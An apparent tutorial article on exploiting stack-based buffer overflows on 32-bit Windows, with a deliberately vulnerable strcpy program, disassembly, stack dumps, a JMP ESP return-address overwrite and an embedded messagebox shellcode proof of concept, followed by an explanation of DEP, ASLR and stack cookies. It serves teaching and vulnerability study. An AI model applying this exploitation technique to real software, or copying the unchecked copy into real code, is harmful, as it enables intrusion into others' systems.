Stack Based Buffer Overflows on x86 (Windows) – Part II

In the first part of this article, we discussed the basics needed to properly understand this type of vulnerability. Now that we have covered how the compilation process works, what assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.

Introduction

As discussed previously, during a function call the stack contains the following, listed from the lowest address (the local variables) to the highest address (the function parameters):

  • Local variables of the function (for example 20 bytes)
  • Previous EBP value (to create the stack frame, saved with PUSH EBP)
  • Return address (placed on the stack by the CALL instruction)
  • Parameters of the function (placed on the stack using PUSH instructions)
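The layout above can be modelled as a C structure. This is only a sketch: the `FrameModel` type, its field names and the `bytes_before_return_address` helper are hypothetical, and it assumes 20 bytes of locals and 32-bit (4-byte) values for the saved EBP, the return address and the parameter. A real compiler is free to add padding or arrange the locals differently.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of one 32-bit stack frame, lowest address first.
 * Field names are illustrative; a real compiler may lay things out differently. */
struct FrameModel {
    char     locals[20];      /* local variables (for example a 20-byte buffer) */
    uint32_t saved_ebp;       /* previous EBP, saved with PUSH EBP */
    uint32_t return_address;  /* placed on the stack by the CALL instruction */
    uint32_t parameter;       /* placed on the stack by the caller with PUSH */
};

/* The offsets follow directly from the sizes of the preceding fields. */
static_assert(offsetof(struct FrameModel, saved_ebp) == 20, "saved EBP follows the locals");
static_assert(offsetof(struct FrameModel, return_address) == 24, "return address follows saved EBP");
static_assert(offsetof(struct FrameModel, parameter) == 28, "parameter follows the return address");

/* Number of bytes between the start of the locals and the return address. */
size_t bytes_before_return_address(void)
{
    return offsetof(struct FrameModel, return_address);
}
```

In this model, 24 bytes separate the start of the local variables from the return address, a distance that becomes important later in the article.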

If you understand this layout, the Stack Based Buffer Overflow vulnerability is easy to understand. Let’s take the following example, in which a function is called from the “main” function:

#define _CRT_SECURE_NO_WARNINGS

#include "stdafx.h"
#include <stdio.h> 
#include <string.h>

// Function that displays the name 
void Display(char *p_pcName) 
{ 
    // Buffer (local variable) that will store the name 
    char buffer[20]; 
 
    // We copy the name in buffer 
    strcpy(buffer, p_pcName); 
 
    // Display the name 
    printf("Hello: %s", buffer); 
}

// Main function
int main() 
{ 
    Display("111122223333");
}

The program is very simple: it calls the “Display” function with the specified parameter.

We can see the problem here:

char buffer[20];
strcpy(buffer, p_pcName);

We have a local variable, buffer, which can store up to 20 bytes.

It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]”. Our version declares a local variable whose 20 bytes are allocated directly on the stack. The other two versions allocate the space for the buffer dynamically, and the data is stored in another memory region called the “HEAP”, not on the stack. By the way, there are also “Heap Based Buffer Overflows”, but they are more complicated.

Having a local variable that can store 20 bytes on the stack, we copy the string received as a parameter into that memory location. In a real program, this string could come from the command line, for example. What happens if the string, including its terminating NULL byte, is longer than 20 bytes? We have a “buffer overflow”. The name “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.
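To make the size problem concrete, here is a minimal sketch of a copy that checks the length first. The `copy_name_checked` helper is hypothetical (it is not part of the example program); it only illustrates the comparison that “strcpy” never performs.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copies src into dst only if it fits, including
 * the terminating NULL byte. Returns 0 on success, -1 if src is too long. */
int copy_name_checked(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL);

    size_t needed = strlen(src) + 1;   /* characters plus the NULL terminator */
    if (needed > dst_size) {
        return -1;                     /* strcpy would write past the buffer here */
    }
    memcpy(dst, src, needed);
    return 0;
}
```

With a 20-byte buffer, a string of 19 characters still fits, while a string of exactly 20 characters is already one byte too long because of the terminator.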

Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from project settings all optimizations, security features and functionalities that we don’t need.

Below is the compiled code of the main function:

000E1030 | 55             | push ebp            | Save previous EBP
000E1031 | 8B EC          | mov ebp,esp         | Create stack frame 
000E1033 | 68 0C 30 0E 00 | push sbof.E300C     | "111122223333"
000E1038 | E8 C3 FF FF FF | call <sbof.Display> | Call the function
000E103D | 83 C4 04       | add esp,4           | Clean the stack
000E1040 | 33 C0          | xor eax,eax         | eax = 0
000E1042 | 5D             | pop ebp             | Remove stack frame
000E1043 | C3             | ret                 | Return

As you can see, everything is as expected: there is a single PUSH for the “111122223333” string parameter, a function call, and then the stack is cleaned.

Below is the compiled code of the Display function:

000E1000 | 55             | push ebp                      | 
000E1001 | 8B EC          | mov ebp,esp                   |

000E1003 | 83 EC 14       | sub esp,14                    | Allocate space on the stack for the buffer

000E1006 | 8B 45 08       | mov eax,dword ptr ss:[ebp+8]  | Get in EAX the string parameter address
000E1009 | 50             | push eax                      | Place it on the stack (second parameter)
000E100A | 8D 4D EC       | lea ecx,dword ptr ss:[ebp-14] | Get in ECX the address of the "buffer"
000E100D | 51             | push ecx                      | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy>            | Call strcpy(buffer, p_pcName); 
000E1013 | 83 C4 08       | add esp,8                     | Clean the stack

000E1016 | 8D 55 EC       | lea edx,dword ptr ss:[ebp-14] | Get in EDX the address of the "buffer"
000E1019 | 52             | push edx                      | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000               | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf>            | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08       | add esp,8                     | Clean the stack

000E1027 | 8B E5          | mov esp,ebp                   |
000E1029 | 5D             | pop ebp                       |
000E102A | C3             | ret                           |

The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:

  1. strcpy – with two parameters: the buffer and our string (111122223333)
  2. printf – with two parameters: the “Hello: %s” string and the buffer containing our string (111122223333)

Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20

00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

As you can see, the first 20 bytes (the first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the buffer contains junk data (it is not initialized with NULLs). However, please note the value that follows “3333”: 770F8600. Its lowest byte (00), which is stored first in memory because of little-endian ordering, is the NULL byte added by the “strcpy” function.
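The same effect can be reproduced in isolation. The sketch below uses a hypothetical `fill_then_copy` function: it fills a 20-byte array with the marker value 0xAA (an arbitrary stand-in for leftover stack data) and then copies the 12-character string into it.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical demo: pre-fill a 20-byte buffer with a marker value that
 * stands in for leftover stack data, then copy a 12-character string. */
void fill_then_copy(unsigned char *out)
{
    assert(out != NULL);

    memset(out, 0xAA, 20);                 /* simulated "junk" bytes */
    strcpy((char *)out, "111122223333");   /* writes 12 characters + 1 NULL byte */
}
```

After the call, bytes 0 to 11 hold the string, byte 12 is the NULL terminator, and bytes 13 to 19 still hold the marker value, just as the last 7 bytes of the buffer in the stack dump still hold junk.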

Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes?” As you can probably guess, the answer is “We get a stack based buffer overflow”.

Exploitation

Let’s get back to the stack and see what we have there:

  1. The “buffer” (20 bytes)
  2. The Display function’s EBP
  3. The Return Address
  4. The parameter (the string)

What can go wrong? Let’s remember what happens when a function returns (on the RETN instruction): execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with something else… we can control the execution of the program!

This is what happens if we use a string parameter of 28 bytes instead of one that fits in the 20-byte buffer.

We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"

00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | String parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

This means that when the execution of the “Display” function finishes (at the RETN instruction), execution will jump to the address “0x37373737”. So, in conclusion, the EIP value will be 0x37373737, a value that we control.
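The overwrite can be simulated safely on a plain byte array. The sketch below is a model only: the `simulated_return_address` function and the constants are hypothetical, and the array merely stands in for the [buffer | saved EBP | return address] region of the stack described above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUFFER_SIZE      20u   /* char buffer[20] */
#define SAVED_EBP_SIZE    4u
#define RETURN_ADDR_SIZE  4u
#define MODEL_SIZE       64u   /* large enough to keep the simulated overflow inside the model */

/* Hypothetical simulation: copies `input` into a byte array that models
 * [buffer | saved EBP | return address | ...] and returns the 32-bit value
 * found in the return-address slot afterwards. */
uint32_t simulated_return_address(const char *input, uint32_t original_return)
{
    unsigned char model[MODEL_SIZE] = {0};
    size_t ret_offset = BUFFER_SIZE + SAVED_EBP_SIZE;   /* 24 */
    size_t length = strlen(input) + 1;                  /* strcpy also copies the NULL byte */
    uint32_t value = 0;

    assert(length <= MODEL_SIZE);

    /* Store the original return address in little-endian byte order. */
    for (size_t i = 0; i < RETURN_ADDR_SIZE; i++) {
        model[ret_offset + i] = (unsigned char)(original_return >> (8 * i));
    }

    /* The unchecked copy: every byte of `input` lands in the model. */
    memcpy(model, input, length);

    /* Read the return-address slot back as a little-endian 32-bit value. */
    for (size_t i = 0; i < RETURN_ADDR_SIZE; i++) {
        value |= (uint32_t)model[ret_offset + i] << (8 * i);
    }
    return value;
}
```

With the 12-character string the slot keeps its original value (for example 0x000E103D), while the 28-character string replaces it with 0x37373737, the ASCII bytes of “7777”.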

After the RETN instruction, the return address is removed from the stack. This means that the top of the stack, the ESP register, will point to the address 0x00B9FEEC. If we use a string longer than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address), the extra bytes overwrite the stack starting at exactly that address. Since ESP will then point to data that we control, how can we easily execute arbitrary code?

There are two things we control:

  1. The return address (EIP)
  2. The data at the top of the stack (ESP)

The easiest solution is to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or of one of the DLLs, has a JMP ESP instruction at address 0x12345678. We replace the return address with the address of this instruction (0x12345678 instead of 0x37373737), which redirects the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!

Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open a program and step through its instructions, letting you see the contents of memory and the register values at runtime. It is a powerful tool with multiple features. Looking at the top of the SBOF.exe program, we can see our two functions. Below is a screenshot.

x64 example

Click each “PUSH EBP” instruction at the beginning of the functions and press F2. This places a breakpoint, so when you run the program in the debugger, it will stop at those instructions. You can use F7 to step into each instruction, or F8 to step over: it also executes one instruction at a time, but on a CALL instruction it runs the whole function call without descending into it. Pressing F9 runs the program, and the debugger stops at the breakpoints you set or when an error occurs. It is well worth playing around with the debugger to see how powerful its features are.

Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:

// Function that does nothing, it just contains a JMP ESP instruction
void Nothing()
{
    __asm
    {
        jmp esp;
    }
}

As you can see in the debugger, the program also contains some other instructions and it uses DLLs (such as kernel32.dll, ntdll.dll), which also contain a lot of code. We can search all this code for a JMP ESP instruction. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.

x64 search jmp

In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:

01371033 | FF E4 | jmp esp |

x64 jmp esp

Please note that you might see totally different addresses, since modern operating systems randomize memory addresses for security reasons. You will find more details later in this article.

So, in order to create a working proof of concept, we have to create a string with the following layout:

  1. First 20 bytes will be the buffer
  2. Second 4 bytes will overwrite the saved EBP
  3. Following 4 bytes will be 0x01371033 – the address of the JMP ESP instruction
  4. The next bytes will represent the code we want to execute

So, let’s change the main function to the following:

int main() 
{ 
    Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}

As you can see, our string contains the 0x01371033 address, but in reverse byte order! This is because data is stored as “little endian” in memory, as we discussed in the first part of the article. The “cc” bytes that follow represent the “INT 3” instruction, which pauses execution in the debugger as if we had set a breakpoint.
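The byte order can be checked with a few lines of C. The `encode_le32` helper below is hypothetical and only illustrates how a 32-bit value is split into bytes, least significant byte first.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: writes a 32-bit value into out[0..3] in
 * little-endian order (least significant byte first). */
void encode_le32(uint32_t value, unsigned char *out)
{
    assert(out != NULL);

    out[0] = (unsigned char)(value & 0xFF);
    out[1] = (unsigned char)((value >> 8) & 0xFF);
    out[2] = (unsigned char)((value >> 16) & 0xFF);
    out[3] = (unsigned char)((value >> 24) & 0xFF);
}
```

For the value 0x01371033 this produces the bytes 33 10 37 01, which is exactly the “\x33\x10\x37\x01” sequence used in the string.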

We can replace this with shellcode. Shellcode is special code, most of the time written in Assembly, that works directly once assembled, wherever it is placed in memory. Normal machine code will not work this way: its strings, for example, are placed in different memory regions and the code relies on known function addresses. In shellcode, the strings are placed in the same place as the code, and the shellcode finds the addresses of the functions by itself. If you want to know in detail how shellcode works on Windows and how you can write one manually, I recommend the following articles:

  1. Introduction to Windows shellcode development – Part 1
  2. Introduction to Windows shellcode development – Part 2
  3. Introduction to Windows shellcode development – Part 3

In order to keep things simple, we will use an existing shellcode. We can use this one: User32-free Messagebox Shellcode for any Windows version.

We will modify the main function to include this code. It will look like this:

int main() 
{ 
    Display(
        "111122223333444455556666\x33\x10\x37\x01"
        "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
        "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
        "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
        "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
        "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
        "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
        "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
        "\x49\x0b\x31\xc0\x51\x50\xff\xd7"
    );
}

As you can see, we have:

  1. Some random data
  2. Followed by the “JMP ESP” address
  3. The shellcode we copied from the above link

Please note that all this data must not contain a NULL byte. Since the vulnerable call is a call to the “strcpy” function, copying stops at the first NULL byte, and the rest of the data would not be copied.
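This constraint is easy to verify before using a sequence of bytes. The sketch below assumes a hypothetical `first_nul_offset` helper that scans a byte array and reports where the first NULL byte is, if there is one.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: returns the index of the first 0x00 byte in
 * data[0..len-1], or -1 if there is none. */
long first_nul_offset(const unsigned char *data, size_t len)
{
    assert(data != NULL);

    for (size_t i = 0; i < len; i++) {
        if (data[i] == 0x00) {
            return (long)i;
        }
    }
    return -1;
}
```

For example, the bytes 33 10 37 01 CC contain no NULL byte, so the function returns -1. An address such as 0x000E3000 would be stored as 00 30 0E 00, and “strcpy” would stop at its very first byte.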

Now, when we execute this program, this happens:

x64 shellcode ok

We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.

Now, you might think this is not a useful example. Of course it is not; it is for educational purposes. However, a real program might get the string from the command line or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:

  • Getting data from the command line
  • Parsing a document (such as XML, HTML, PDF)
  • Reading data from the network (such as a FTP server, HTTP server)

Protection mechanisms

There are a few protections built to protect against this type of attack. All modern compilers and operating systems should have them.

DEP – Data Execution Prevention – is a protection mechanism that works at both the hardware level (the NX bit, “No eXecute”) and the software level. It does not allow code to be executed from memory regions that do not have the “execute” permission. A memory page can have “read”, “write” and/or “execute” permissions. For example, a memory region containing data, such as strings, can have “read” or “read-write” permissions, while a memory region containing code will have “read-execute” permissions. The stack has read-write permissions, so it should not be possible to execute code from it. Without DEP this is possible; with DEP, code execution from the stack is blocked. Since our shellcode was executed from the stack, this protection would block our attack. It can be enabled from “Configuration Properties” > “Linker” > “Advanced” > “Data Execution Prevention (DEP)”.

ASLR – Address Space Layout Randomization – was introduced in Windows Vista, which is why this vulnerability is easier to study on Windows XP. It is another protection mechanism against this type of attack. As we discussed, the DLLs and the executable contain instructions, such as “JMP ESP”, that attackers can use. Before ASLR, the executable and the DLLs were always loaded in memory at the same addresses. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll would always be loaded at the same address. This means that attackers could rely on the instructions from those binaries. With ASLR, all modules, as well as the stack and the heap, are loaded at random addresses. We can still find the address of a JMP ESP instruction, but it will not work on another machine, because the module containing the instruction will be loaded at a different (randomly generated) address. This feature can be activated from “Configuration Properties” > “Linker” > “Advanced” > “Randomized Base Address”.

Stack Cookies – This is another protection mechanism, built specifically against this type of attack, and it is offered by the compiler. It works by placing a random value, called a “stack cookie”, on the stack at the beginning of a function, between the local variables (such as our buffer) and the saved EBP and return address. A stack based buffer overflow overwrites the data following the buffer, so it also overwrites this random value before it can reach the return address. Before the “RETN” instruction, the function checks the value of the stack cookie. If a stack based buffer overflow occurred, the value has changed and the verification fails, so the program is forcibly stopped and the shellcode is not executed. This protection can be configured from “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.
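The idea behind the cookie check can be sketched on a byte array. This is a simplified model under stated assumptions, not the compiler's actual implementation: the `cookie_survives` function, the constants and the frame layout (20-byte buffer, then a 4-byte cookie, then the saved EBP and the return address) are all hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified model of a protected frame, lowest address first:
 * [ buffer (20) | cookie (4) | saved EBP (4) | return address (4) ].
 * Illustration only; the real compiler-generated check is more involved. */
#define COOKIE_OFFSET 20u
#define FRAME_SIZE    64u

/* Copies `input` (plus its NULL byte) into the model frame and reports whether
 * the cookie still holds its original value: 1 = intact, 0 = corrupted. */
int cookie_survives(const char *input, uint32_t cookie)
{
    unsigned char frame[FRAME_SIZE] = {0};
    size_t length = strlen(input) + 1;
    uint32_t after;

    assert(length <= FRAME_SIZE);

    memcpy(frame + COOKIE_OFFSET, &cookie, sizeof cookie);  /* function entry: store the cookie */
    memcpy(frame, input, length);                           /* the unchecked copy */
    memcpy(&after, frame + COOKIE_OFFSET, sizeof after);    /* before returning: re-read the cookie */

    return after == cookie;
}
```

In this model, the 12-character string leaves the cookie intact, while the 28-character string overwrites it on its way to the return address, so the check would fail before the return address is ever used.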

Conclusion

Even though this type of vulnerability is not difficult to understand, the main difficulty is learning a few concepts, such as Assembly language and how programs work under the hood. Due to the existing protection mechanisms, real-life exploitation of this type of vulnerability is far more difficult. However, there are a few tricks that can be used in certain situations to bypass some of the protections (if others are not present), but this is not the purpose of this article.

My suggestion, in order to properly understand this vulnerability, is to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer, but the most important thing is to go instruction by instruction and understand everything in detail. You can download the source code of the above example from here.

If you have any questions, please leave a comment here or use the contact email.
